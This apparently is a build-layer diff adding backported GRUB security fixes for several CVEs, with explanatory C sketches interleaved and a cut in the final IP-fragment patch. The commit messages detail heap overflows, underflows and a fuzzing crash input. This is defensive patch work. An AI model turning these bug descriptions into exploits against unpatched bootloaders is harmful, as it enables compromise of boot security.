@@ -0,0 +1,65 @@
+From dcc5a434e59f721b03cc809db0375a24aa2ac6d0 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Sat, 7 Nov 2020 01:03:18 +0100
+Subject: [PATCH] docs: Document the cutmem command
+
+The command is not present in the docs/grub.texi user documentation.
+
+Reported-by: Daniel Kiper <daniel.kiper@oracle.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Signed-off-by: Daniel Kiper <daniel.kiper@oracle.com>
+Reviewed-by: Javier Martinez Canillas <javierm@redhat.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=f05e79a0143beb2d9a482a3ebf4fe0ce76778122]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 21 +++++++++++++++++++++
+ 1 file changed, 21 insertions(+)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index ccf1908..ae85f55 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -3892,6 +3892,7 @@ you forget a command, you can run the command @command{help}
+ * cpuid:: Check for CPU features
+ * crc:: Compute or check CRC32 checksums
+ * cryptomount:: Mount a crypto device
++* cutmem:: Remove memory regions
+ * date:: Display or set current date and time
+ * devicetree:: Load a device tree blob
+ * distrust:: Remove a pubkey from trusted keys
+@@ -4051,6 +4052,8 @@ this page is to be filtered. This syntax makes it easy to represent patterns
+ that are often result of memory damage, due to physical distribution of memory
+ cells.
+
++The command is similar to @command{cutmem} command.
++
+ Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
+ This prevents removing EFI memory regions to potentially subvert the
+ security mechanisms provided by the UEFI secure boot.
+@@ -4214,6 +4217,24 @@ GRUB suports devices encrypted using LUKS and geli. Note that necessary modules
+ be used.
+ @end deffn
+
++@node cutmem
++@subsection cutmem
++
++@deffn Command cutmem from[K|M|G] to[K|M|G]
++Remove any memory regions in specified range.
++@end deffn
++
++This command notifies the memory manager that specified regions of RAM ought to
++be filtered out. This remains in effect after a payload kernel has been loaded
++by GRUB, as long as the loaded kernel obtains its memory map from GRUB. Kernels
++that support this include Linux, GNU Mach, the kernel of FreeBSD and Multiboot
++kernels in general.
++
++The command is similar to @command{badram} command.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This prevents removing EFI memory regions to potentially subvert the
++ security mechanisms provided by the UEFI secure boot.
+
+ @node date
+ @subsection date
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-20225.patch b/meta/recipes-bsp/grub/files/CVE-2021-20225.patch
new file mode 100644
index 0000000000..b864febe62
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-20225.patch
@@ -0,0 +1,58 @@
+From 2a330dba93ff11bc00eda76e9419bc52b0c7ead6 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Fri, 22 Jan 2021 16:07:29 +1100
+Subject: lib/arg: Block repeated short options that require an argument
+
+Fuzzing found the following crash:
+
+ search -hhhhhhhhhhhhhf
+
+We didn't allocate enough option space for 13 hints because the
+allocation code counts the number of discrete arguments (i.e. argc).
+However, the shortopt parsing code will happily keep processing
+a combination of short options without checking if those short
+options require an argument. This means you can easily end writing
+past the allocated option space.
+
+This fixes a OOB write which can cause heap corruption.
+
+Fixes: CVE-2021-20225
+
+Reported-by: Daniel Axtens <dja@axtens.net>
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=2a330dba93ff11bc00eda76e9419bc52b0c7ead6]
+CVE: CVE-2021-20225
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/lib/arg.c | 13 +++++++++++++
+ 1 file changed, 13 insertions(+)
+
+diff --git a/grub-core/lib/arg.c b/grub-core/lib/arg.c
+index 3288609..537c5e9 100644
+--- a/grub-core/lib/arg.c
++++ b/grub-core/lib/arg.c
+@@ -299,6 +299,19 @@ grub_arg_parse (grub_extcmd_t cmd, int argc, char **argv,
+ it can have an argument value. */
+ if (*curshort)
+ {
++ /*
++ * Only permit further short opts if this one doesn't
++ * require a value.
++ */
++ if (opt->type != ARG_TYPE_NONE &&
++ !(opt->flags & GRUB_ARG_OPTION_OPTIONAL))
++ {
++ grub_error (GRUB_ERR_BAD_ARGUMENT,
++ N_("missing mandatory option for `%s'"),
++ opt->longarg);
++ goto fail;
++ }
++
+ if (parse_option (cmd, opt, 0, usr) || grub_errno)
+ goto fail;
+ }
+--
+2.25.1
+
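The allocation counts one option slot per argv entry, while a single bundled argument such as -hhhhhhhhhhhhhf can expand into many value-taking options. A standalone model of the rule the fix enforces, namely that an option requiring a value must end the bundle (plain C, not the grub_arg_parse() code):

#include <stdio.h>
#include <string.h>

/* Reject a short-option bundle in which an option that takes a value is
 * followed by further options, since each such option would consume
 * another value slot that was never allocated. */
static int parse_bundle (const char *bundle, const char *opts_with_value)
{
  const char *p;

  for (p = bundle + 1; *p != '\0'; p++)       /* skip the leading '-' */
    if (strchr (opts_with_value, *p) != NULL && p[1] != '\0')
      {
        fprintf (stderr, "missing mandatory value for -%c\n", *p);
        return -1;
      }
  return 0;
}

int main (void)
{
  printf ("%d\n", parse_bundle ("-hhhhhhhhhhhhhf", "h"));  /* rejected */
  printf ("%d\n", parse_bundle ("-fh", "h"));              /* accepted: 'h' is last */
  return 0;
}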
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-20233.patch b/meta/recipes-bsp/grub/files/CVE-2021-20233.patch
new file mode 100644
index 0000000000..d2069afc18
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-20233.patch
@@ -0,0 +1,50 @@
+From 2f533a89a8dfcacbf2c9dbc77d910f111f24bf33 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Fri, 22 Jan 2021 17:10:48 +1100
+Subject: commands/menuentry: Fix quoting in setparams_prefix()
+
+Commit 9acdcbf32542 (use single quotes in menuentry setparams command)
+says that expressing a quoted single quote will require 3 characters. It
+actually requires (and always did require!) 4 characters:
+
+ str: a'b => a'\''b
+ len: 3 => 6 (2 for the letters + 4 for the quote)
+
+This leads to not allocating enough memory and thus out of bounds writes
+that have been observed to cause heap corruption.
+
+Allocate 4 bytes for each single quote.
+
+Commit 22e7dbb2bb81 (Fix quoting in legacy parser.) does the same
+quoting, but it adds 3 as extra overhead on top of the single byte that
+the quote already needs. So it's correct.
+
+Fixes: 9acdcbf32542 (use single quotes in menuentry setparams command)
+Fixes: CVE-2021-20233
+
+Reported-by: Daniel Axtens <dja@axtens.net>
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=2f533a89a8dfcacbf2c9dbc77d910f111f24bf33]
+CVE: CVE-2021-20233
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/commands/menuentry.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/commands/menuentry.c b/grub-core/commands/menuentry.c
+index 9164df7..720e6d8 100644
+--- a/grub-core/commands/menuentry.c
++++ b/grub-core/commands/menuentry.c
+@@ -230,7 +230,7 @@ setparams_prefix (int argc, char **args)
+ len += 3; /* 3 = 1 space + 2 quotes */
+ p = args[i];
+ while (*p)
+- len += (*p++ == '\'' ? 3 : 1);
++ len += (*p++ == '\'' ? 4 : 1);
+ }
+
+ result = grub_malloc (len + 2);
+--
+2.25.1
+
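The arithmetic is easy to check by hand: each embedded single quote becomes the four characters '\'' when re-quoted. A standalone helper that computes the required length (plain C sketch, not the menuentry code):

#include <stdio.h>

/* Bytes needed to single-quote a string: 2 for the surrounding quotes,
 * 1 per ordinary character, and 4 per embedded quote ('\''). */
static size_t quoted_len (const char *s)
{
  size_t len = 2;

  for (; *s != '\0'; s++)
    len += (*s == '\'') ? 4 : 1;
  return len;
}

int main (void)
{
  /* "a'b" quotes to 'a'\''b': 2 letters + 4 for the quote + 2 outer quotes = 8. */
  printf ("%zu\n", quoted_len ("a'b"));
  return 0;
}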
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3695.patch b/meta/recipes-bsp/grub/files/CVE-2021-3695.patch
new file mode 100644
index 0000000000..7d6e805725
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3695.patch
@@ -0,0 +1,178 @@
+From 0693d672abcf720419f86c56bda6428c540e2bb1 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 20 Jul 2022 10:01:35 +0530
+Subject: [PATCH] CVE-2021-3695
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=e623866d9286410156e8b9d2c82d6253a1b22d08]
+CVE: CVE-2021-3695
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+ video/readers/png: Drop greyscale support to fix heap out-of-bounds write
+
+A 16-bit greyscale PNG without alpha is processed in the following loop:
+
+ for (i = 0; i < (data->image_width * data->image_height);
+ i++, d1 += 4, d2 += 2)
+{
+ d1[R3] = d2[1];
+ d1[G3] = d2[1];
+ d1[B3] = d2[1];
+}
+
+The increment of d1 is wrong. d1 is incremented by 4 bytes per iteration,
+but there are only 3 bytes allocated for storage. This means that image
+data will overwrite somewhat-attacker-controlled parts of memory - 3 bytes
+out of every 4 following the end of the image.
+
+This has existed since greyscale support was added in 2013 in commit
+3ccf16dff98f (grub-core/video/readers/png.c: Support grayscale).
+
+Saving starfield.png as a 16-bit greyscale image without alpha in the gimp
+and attempting to load it causes grub-emu to crash - I don't think this code
+has ever worked.
+
+Delete all PNG greyscale support.
+
+Fixes: CVE-2021-3695
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/video/readers/png.c | 89 ++++-------------------------------
+ 1 file changed, 8 insertions(+), 81 deletions(-)
+
+diff --git a/grub-core/video/readers/png.c b/grub-core/video/readers/png.c
+index 0157ff7..db4a9d4 100644
+--- a/grub-core/video/readers/png.c
++++ b/grub-core/video/readers/png.c
+@@ -100,7 +100,7 @@ struct grub_png_data
+
+ unsigned image_width, image_height;
+ int bpp, is_16bit;
+- int raw_bytes, is_gray, is_alpha, is_palette;
++ int raw_bytes, is_alpha, is_palette;
+ int row_bytes, color_bits;
+ grub_uint8_t *image_data;
+
+@@ -280,13 +280,13 @@ grub_png_decode_image_header (struct grub_png_data *data)
+ data->bpp = 3;
+ else
+ {
+- data->is_gray = 1;
+- data->bpp = 1;
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE,
++ "png: color type not supported");
+ }
+
+ if ((color_bits != 8) && (color_bits != 16)
+ && (color_bits != 4
+- || !(data->is_gray || data->is_palette)))
++ || !data->is_palette))
+ return grub_error (GRUB_ERR_BAD_FILE_TYPE,
+ "png: bit depth must be 8 or 16");
+
+@@ -315,7 +315,7 @@ grub_png_decode_image_header (struct grub_png_data *data)
+ }
+
+ #ifndef GRUB_CPU_WORDS_BIGENDIAN
+- if (data->is_16bit || data->is_gray || data->is_palette)
++ if (data->is_16bit || data->is_palette)
+ #endif
+ {
+ data->image_data = grub_calloc (data->image_height, data->row_bytes);
+@@ -859,27 +859,8 @@ grub_png_convert_image (struct grub_png_data *data)
+ int shift;
+ int mask = (1 << data->color_bits) - 1;
+ unsigned j;
+- if (data->is_gray)
+- {
+- /* Generic formula is
+- (0xff * i) / ((1U << data->color_bits) - 1)
+- but for allowed bit depth of 1, 2 and for it's
+- equivalent to
+- (0xff / ((1U << data->color_bits) - 1)) * i
+- Precompute the multipliers to avoid division.
+- */
+-
+- const grub_uint8_t multipliers[5] = { 0xff, 0xff, 0x55, 0x24, 0x11 };
+- for (i = 0; i < (1U << data->color_bits); i++)
+- {
+- grub_uint8_t col = multipliers[data->color_bits] * i;
+- palette[i][0] = col;
+- palette[i][1] = col;
+- palette[i][2] = col;
+- }
+- }
+- else
+- grub_memcpy (palette, data->palette, 3 << data->color_bits);
++
++ grub_memcpy (palette, data->palette, 3 << data->color_bits);
+ d1c = d1;
+ d2c = d2;
+ for (j = 0; j < data->image_height; j++, d1c += data->image_width * 3,
+@@ -917,61 +898,7 @@ grub_png_convert_image (struct grub_png_data *data)
+ return;
+ }
+
+- if (data->is_gray)
+- {
+- switch (data->bpp)
+- {
+- case 4:
+- /* 16-bit gray with alpha. */
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 4, d2 += 4)
+- {
+- d1[R4] = d2[3];
+- d1[G4] = d2[3];
+- d1[B4] = d2[3];
+- d1[A4] = d2[1];
+- }
+- break;
+- case 2:
+- if (data->is_16bit)
+- /* 16-bit gray without alpha. */
+- {
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 4, d2 += 2)
+- {
+- d1[R3] = d2[1];
+- d1[G3] = d2[1];
+- d1[B3] = d2[1];
+- }
+- }
+- else
+- /* 8-bit gray with alpha. */
+- {
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 4, d2 += 2)
+- {
+- d1[R4] = d2[1];
+- d1[G4] = d2[1];
+- d1[B4] = d2[1];
+- d1[A4] = d2[0];
+- }
+- }
+- break;
+- /* 8-bit gray without alpha. */
+- case 1:
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 3, d2++)
+- {
+- d1[R3] = d2[0];
+- d1[G3] = d2[0];
+- d1[B3] = d2[0];
+- }
+- break;
+- }
+- return;
+- }
+-
+- {
++ {
+ /* Only copy the upper 8 bit. */
+ #ifndef GRUB_CPU_WORDS_BIGENDIAN
+ for (i = 0; i < (data->image_width * data->image_height * data->bpp >> 1);
+--
+2.25.1
+
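The size mismatch described above is easy to quantify: the destination was allocated at 3 bytes per pixel, but the buggy loop advanced the write pointer by 4 per pixel. A small standalone calculation of the resulting overrun (plain C; the image size is just an example, and R3/G3/B3 are taken to index the three bytes of one output pixel):

#include <stdio.h>

int main (void)
{
  unsigned long w = 640, h = 480;
  unsigned long pixels = w * h;
  unsigned long allocated = 3UL * pixels;              /* bytes actually allocated */
  unsigned long last_write = 4UL * (pixels - 1) + 2;   /* highest offset the loop writes */

  printf ("buffer ends at offset %lu, last write lands at offset %lu\n",
          allocated - 1, last_write);
  return 0;
}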
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3696.patch b/meta/recipes-bsp/grub/files/CVE-2021-3696.patch
new file mode 100644
index 0000000000..ef6da945c4
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3696.patch
@@ -0,0 +1,46 @@
+From b18ce59d6496a9313d75f9497a0efac61dcf4191 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 20 Jul 2022 10:05:42 +0530
+Subject: [PATCH] CVE-2021-3696
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=210245129c932dc9e1c2748d9d35524fb95b5042]
+CVE: CVE-2021-3696
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+video/readers/png: Avoid heap OOB R/W inserting huff table items
+
+In fuzzing we observed crashes where a code would attempt to be inserted
+into a huffman table before the start, leading to a set of heap OOB reads
+and writes as table entries with negative indices were shifted around and
+the new code written in.
+
+Catch the case where we would underflow the array and bail.
+
+Fixes: CVE-2021-3696
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/video/readers/png.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/grub-core/video/readers/png.c b/grub-core/video/readers/png.c
+index 36b3f10..3c05951 100644
+--- a/grub-core/video/readers/png.c
++++ b/grub-core/video/readers/png.c
+@@ -416,6 +416,13 @@ grub_png_insert_huff_item (struct huff_table *ht, int code, int len)
+ for (i = len; i < ht->max_length; i++)
+ n += ht->maxval[i];
+
++ if (n > ht->num_values)
++ {
++ grub_error (GRUB_ERR_BAD_FILE_TYPE,
++ "png: out of range inserting huffman table item");
++ return;
++ }
++
+ for (i = 0; i < n; i++)
+ ht->values[ht->num_values - i] = ht->values[ht->num_values - i - 1];
+
+--
+2.25.1
+
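The guard added above ensures the number of entries to shift never exceeds what is stored, since shifting more would index before the start of the array. The same pattern in a standalone form (plain C, not the Huffman-table code):

#include <stdio.h>

#define CAP 8

/* Insert v so that the last n stored elements move up by one slot.
 * If n exceeds the stored count, the shift would read before the start
 * of the array, so reject it instead. */
static int insert_before_tail (int *vals, int *count, int n, int v)
{
  int i;

  if (n < 0 || n > *count || *count >= CAP)
    return -1;

  for (i = 0; i < n; i++)
    vals[*count - i] = vals[*count - i - 1];

  vals[*count - n] = v;
  (*count)++;
  return 0;
}

int main (void)
{
  int vals[CAP] = { 1, 2, 3 };
  int count = 3;

  if (insert_before_tail (vals, &count, 5, 9) != 0)   /* n > count: rejected */
    printf ("rejected oversized shift\n");

  insert_before_tail (vals, &count, 1, 9);            /* array becomes 1 2 9 3 */
  printf ("%d %d %d %d\n", vals[0], vals[1], vals[2], vals[3]);
  return 0;
}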
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3697.patch b/meta/recipes-bsp/grub/files/CVE-2021-3697.patch
new file mode 100644
index 0000000000..be15e7d1f2
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3697.patch
@@ -0,0 +1,82 @@
+From 4de9de9d14f4ac27229e45514627534e32cc4406 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 19 Jul 2022 11:13:02 +0530
+Subject: [PATCH] CVE-2021-3697
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=22a3f97d39f6a10b08ad7fd1cc47c4dcd10413f6]
+CVE: CVE-2021-3697
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+video/readers/jpeg: Block int underflow -> wild pointer write
+
+Certain 1 px wide images caused a wild pointer write in
+grub_jpeg_ycrcb_to_rgb(). This was caused because in grub_jpeg_decode_data(),
+we have the following loop:
+
+for (; data->r1 < nr1 && (!data->dri || rst);
+ data->r1++, data->bitmap_ptr += (vb * data->image_width - hb * nc1) * 3)
+
+We did not check if vb * width >= hb * nc1.
+
+On a 64-bit platform, if that turns out to be negative, it will underflow,
+be interpreted as unsigned 64-bit, then be added to the 64-bit pointer, so
+we see data->bitmap_ptr jump, e.g.:
+
+0x6180_0000_0480 to
+0x6181_0000_0498
+ ^
+ ~--- carry has occurred and this pointer is now far away from
+ any object.
+
+On a 32-bit platform, it will decrement the pointer, creating a pointer
+that won't crash but will overwrite random data.
+
+Catch the underflow and error out.
+
+Fixes: CVE-2021-3697
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/video/readers/jpeg.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/video/readers/jpeg.c b/grub-core/video/readers/jpeg.c
+index 31359a4..545a60b 100644
+--- a/grub-core/video/readers/jpeg.c
++++ b/grub-core/video/readers/jpeg.c
+@@ -23,6 +23,7 @@
+ #include <grub/mm.h>
+ #include <grub/misc.h>
+ #include <grub/bufio.h>
++#include <grub/safemath.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -617,6 +618,7 @@ static grub_err_t
+ grub_jpeg_decode_data (struct grub_jpeg_data *data)
+ {
+ unsigned c1, vb, hb, nr1, nc1;
++ unsigned stride_a, stride_b, stride;
+ int rst = data->dri;
+
+ vb = 8 << data->log_vs;
+@@ -624,8 +626,14 @@ grub_jpeg_decode_data (struct grub_jpeg_data *data)
+ nr1 = (data->image_height + vb - 1) >> (3 + data->log_vs);
+ nc1 = (data->image_width + hb - 1) >> (3 + data->log_hs);
+
++ if (grub_mul(vb, data->image_width, &stride_a) ||
++ grub_mul(hb, nc1, &stride_b) ||
++ grub_sub(stride_a, stride_b, &stride))
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE,
++ "jpeg: cannot decode image with these dimensions");
++
+ for (; data->r1 < nr1 && (!data->dri || rst);
+- data->r1++, data->bitmap_ptr += (vb * data->image_width - hb * nc1) * 3)
++ data->r1++, data->bitmap_ptr += stride * 3)
+ for (c1 = 0; c1 < nc1 && (!data->dri || rst);
+ c1++, rst--, data->bitmap_ptr += hb * 3)
+ {
+--
+2.25.1
+
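grub_mul() and grub_sub() are thin wrappers around the compiler overflow builtins (see the safemath.h additions bundled with the font size-overflow patch later in this series), so the stride check above can be modelled without the GRUB tree. The dimensions below are made up; the point is only that a 1 px wide image makes the subtraction underflow and gets rejected:

#include <stdio.h>

static int
checked_stride (unsigned vb, unsigned width,
                unsigned hb, unsigned nc1, unsigned *stride)
{
  unsigned a, b;

  if (__builtin_mul_overflow (vb, width, &a) ||
      __builtin_mul_overflow (hb, nc1, &b) ||
      __builtin_sub_overflow (a, b, stride))
    return -1;   /* reject: the expression would wrap around */

  return 0;
}

int
main (void)
{
  unsigned stride;

  /* 1 px wide image: vb * width < hb * nc1, so the subtraction underflows. */
  if (checked_stride (16, 1, 16, 2, &stride))
    puts ("rejected malformed dimensions");

  if (!checked_stride (16, 640, 16, 80, &stride))
    printf ("stride = %u\n", stride);

  return 0;
}
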
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3981.patch b/meta/recipes-bsp/grub/files/CVE-2021-3981.patch
new file mode 100644
index 0000000000..e27027ea65
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3981.patch
@@ -0,0 +1,32 @@
+From 67740c43c9326956ea5cd6be77f813b5499a56a5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 27 Jun 2022 10:15:29 +0530
+Subject: [PATCH] CVE-2021-3981
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/diff/util/grub-mkconfig.in?id=0adec29674561034771c13e446069b41ef41e4d4]
+CVE: CVE-2021-3981
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ util/grub-mkconfig.in | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/util/grub-mkconfig.in b/util/grub-mkconfig.in
+index 9f477ff..ead94a6 100644
+--- a/util/grub-mkconfig.in
++++ b/util/grub-mkconfig.in
+@@ -287,7 +287,11 @@ and /etc/grub.d/* files or please file a bug report with
+ exit 1
+ else
+ # none of the children aborted with error, install the new grub.cfg
+- mv -f ${grub_cfg}.new ${grub_cfg}
++ oldumask=$(umask)
++ umask 077
++ cat ${grub_cfg}.new > ${grub_cfg}
++ umask $oldumask
++ rm -f ${grub_cfg}.new
+ fi
+ fi
+
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-2601.patch b/meta/recipes-bsp/grub/files/CVE-2022-2601.patch
new file mode 100644
index 0000000000..090f693be3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-2601.patch
@@ -0,0 +1,87 @@
+From e8060722acf0bcca037982d7fb29472363ccdfd4 Mon Sep 17 00:00:00 2001
+From: Zhang Boyang <zhangboyang.id@gmail.com>
+Date: Fri, 5 Aug 2022 01:58:27 +0800
+Subject: [PATCH] font: Fix several integer overflows in
+ grub_font_construct_glyph()
+
+This patch fixes several integer overflows in grub_font_construct_glyph().
+Glyphs of invalid size, either zero or large enough to overflow the size calculation, are rejected.
+The inconsistency between "glyph" and "max_glyph_size" when grub_malloc()
+returns NULL is fixed too.
+
+Fixes: CVE-2022-2601
+
+Reported-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=768e1ef2fc159f6e14e7246e4be09363708ac39e]
+CVE: CVE-2022-2601
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/font/font.c | 29 +++++++++++++++++------------
+ 1 file changed, 17 insertions(+), 12 deletions(-)
+
+diff --git a/grub-core/font/font.c b/grub-core/font/font.c
+index df17dba..f110db9 100644
+--- a/grub-core/font/font.c
++++ b/grub-core/font/font.c
+@@ -1509,6 +1509,7 @@ grub_font_construct_glyph (grub_font_t hinted_font,
+ struct grub_video_signed_rect bounds;
+ static struct grub_font_glyph *glyph = 0;
+ static grub_size_t max_glyph_size = 0;
++ grub_size_t cur_glyph_size;
+
+ ensure_comb_space (glyph_id);
+
+@@ -1525,29 +1526,33 @@ grub_font_construct_glyph (grub_font_t hinted_font,
+ if (!glyph_id->ncomb && !glyph_id->attributes)
+ return main_glyph;
+
+- if (max_glyph_size < sizeof (*glyph) + (bounds.width * bounds.height + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT)
++ if (grub_video_bitmap_calc_1bpp_bufsz (bounds.width, bounds.height, &cur_glyph_size) ||
++ grub_add (sizeof (*glyph), cur_glyph_size, &cur_glyph_size))
++ return main_glyph;
++
++ if (max_glyph_size < cur_glyph_size)
+ {
+ grub_free (glyph);
+- max_glyph_size = (sizeof (*glyph) + (bounds.width * bounds.height + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT) * 2;
+- if (max_glyph_size < 8)
+- max_glyph_size = 8;
+- glyph = grub_malloc (max_glyph_size);
++ if (grub_mul (cur_glyph_size, 2, &max_glyph_size))
++ max_glyph_size = 0;
++ glyph = max_glyph_size > 0 ? grub_malloc (max_glyph_size) : NULL;
+ }
+ if (!glyph)
+ {
++ max_glyph_size = 0;
+ grub_errno = GRUB_ERR_NONE;
+ return main_glyph;
+ }
+
+- grub_memset (glyph, 0, sizeof (*glyph)
+- + (bounds.width * bounds.height
+- + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT);
++ grub_memset (glyph, 0, cur_glyph_size);
+
+ glyph->font = main_glyph->font;
+- glyph->width = bounds.width;
+- glyph->height = bounds.height;
+- glyph->offset_x = bounds.x;
+- glyph->offset_y = bounds.y;
++ if (bounds.width == 0 || bounds.height == 0 ||
++ grub_cast (bounds.width, &glyph->width) ||
++ grub_cast (bounds.height, &glyph->height) ||
++ grub_cast (bounds.x, &glyph->offset_x) ||
++ grub_cast (bounds.y, &glyph->offset_y))
++ return main_glyph;
+
+ if (glyph_id->attributes & GRUB_UNICODE_GLYPH_ATTRIBUTE_MIRROR)
+ grub_font_blit_glyph_mirror (glyph, main_glyph,
+--
+2.25.1
+
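A second aspect of the patch above is keeping the cached capacity variable consistent with the buffer it describes: when growing the buffer fails, max_glyph_size is reset so a later call cannot assume the freed buffer is still large enough. A rough standalone model of that idea, with invented sizes and a simple doubling policy:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static char *cache;
static size_t cache_cap;

static char *
get_scratch (size_t need)
{
  if (cache_cap < need)
    {
      free (cache);
      /* Double the request, guarding the multiplication. */
      if (__builtin_mul_overflow (need, (size_t) 2, &cache_cap))
        cache_cap = 0;
      cache = cache_cap ? malloc (cache_cap) : NULL;
    }

  if (cache == NULL)
    {
      cache_cap = 0;   /* keep the capacity consistent with the buffer */
      return NULL;
    }

  memset (cache, 0, need);
  return cache;
}

int
main (void)
{
  printf ("%p\n", (void *) get_scratch (32));
  printf ("%p\n", (void *) get_scratch (16));   /* reuses the cached buffer */
  return 0;
}
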
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28733.patch b/meta/recipes-bsp/grub/files/CVE-2022-28733.patch
new file mode 100644
index 0000000000..6cfdf20e2d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28733.patch
@@ -0,0 +1,60 @@
+From 415fb5eb83cbd3b5cfc25ac1290f2de4fe3d231c Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 1 Aug 2022 10:48:34 +0530
+Subject: [PATCH] CVE-2022-28733
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=3e4817538de828319ba6d59ced2fbb9b5ca13287]
+CVE: CVE-2022-28733
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+net/ip: Do IP fragment maths safely
+
+We can receive packets with invalid IP fragmentation information. This
+can lead to rsm->total_len underflowing and becoming very large.
+
+Then, in grub_netbuff_alloc(), we add to this very large number, which can
+cause it to overflow and wrap back around to a small positive number.
+The allocation then succeeds, but the resulting buffer is too small and
+subsequent operations can write past the end of the buffer.
+
+Catch the underflow here.
+
+Fixes: CVE-2022-28733
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/net/ip.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/net/ip.c b/grub-core/net/ip.c
+index ea5edf8..74e4e8b 100644
+--- a/grub-core/net/ip.c
++++ b/grub-core/net/ip.c
+@@ -25,6 +25,7 @@
+ #include <grub/net/netbuff.h>
+ #include <grub/mm.h>
+ #include <grub/priority_queue.h>
++#include <grub/safemath.h>
+ #include <grub/time.h>
+
+ struct iphdr {
+@@ -512,7 +513,14 @@ grub_net_recv_ip4_packets (struct grub_net_buff *nb,
+ {
+ rsm->total_len = (8 * (grub_be_to_cpu16 (iph->frags) & OFFSET_MASK)
